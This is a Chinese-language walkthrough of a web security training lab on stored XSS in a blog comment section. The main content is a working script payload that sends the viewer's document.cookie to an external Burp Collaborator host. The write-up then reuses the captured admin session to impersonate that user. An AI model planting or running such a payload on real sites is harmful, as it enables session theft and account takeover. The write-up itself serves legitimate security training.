靶场内容
本实验包含博客评论功能中的存储型 XSS漏洞。一个模拟的受害者用户在发布后查看所有评论。为解决实验室,利用该漏洞窃取受害者的会话cookie,然后使用该cookie来冒充受害者。
注意
为了防止 Academy 平台被用来攻击第三方,我们的防火墙会阻止实验室与任意外部系统之间的交互。要解决实验室问题,您应该使用 Burp Collaborator 的默认公共服务器 ( burpcollaborator.net)。
一些用户会注意到这个实验室有一个不需要 Burp Collaborator 的替代解决方案。然而,它远没有泄露 cookie 那么微妙。
解决方法
- XSS窃取Cookie老生常谈了,最喜欢用的就是窃取Cookie了
- 这个靶场还是很细的:
- 找到一个评论区,将JavaScript代码复制到评论区
<script>
fetch('https://8r0adoyya8wnsy5t6m21h3twenkd82.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>- fetch里面的URL内容是Burp Collaborator Client出来的payload
- 之后打开Burp Collaborator Client,可以发现有个HTTP报文
- 点开它,里面是管理员的session
- 之后使用这个cookie去覆盖home页面的cookie就可以解决战斗了
